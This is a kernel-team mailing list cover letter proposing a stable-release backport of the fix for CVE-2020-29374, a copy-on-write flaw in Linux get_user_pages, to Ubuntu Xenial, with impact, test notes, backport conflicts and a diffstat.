[SRU Xenial 0/1] CVE-2020-29374
Thadeu Lima de Souza Cascardo
cascardo at canonical.com
Thu Dec 17 17:06:20 UTC 2020
[Impact]
A child process can read CoW data from a parent. This is the first part of the
writeup at https://bugs.chromium.org/p/project-zero/issues/detail?id=2045.
[Test case]
The code at the Project Zero writeup was the one tested. It was adapted so the
shared data was read at the child before doing get_user_pages_fast, so the fast
path would be taken and the fast path on s390x could be tested.
[Backport]
There were conflicts that were fixed, and FOLL_PIN does not exist on bionic.
Also, s390x and x86 still had their own GUPF implementation at 4.4. So, they
needed to carry a fix of their own based on the generic one.
[Potential regression]
This could break users of GUP and hugepages.
[Tests]
This was tested with and without the touching of data before vmsplice on amd64,
i386, s390x, ppc64el.
Linus Torvalds (1):
gup: document and work around "COW can break either way" issue
arch/s390/mm/gup.c | 9 ++++-
drivers/gpu/drm/i915/i915_gem_userptr.c | 8 +++++
mm/gup.c | 44 +++++++++++++++++++++----
mm/huge_memory.c | 7 ++--
4 files changed, 57 insertions(+), 11 deletions(-)
--
2.27.0
More information about the kernel-team
mailing list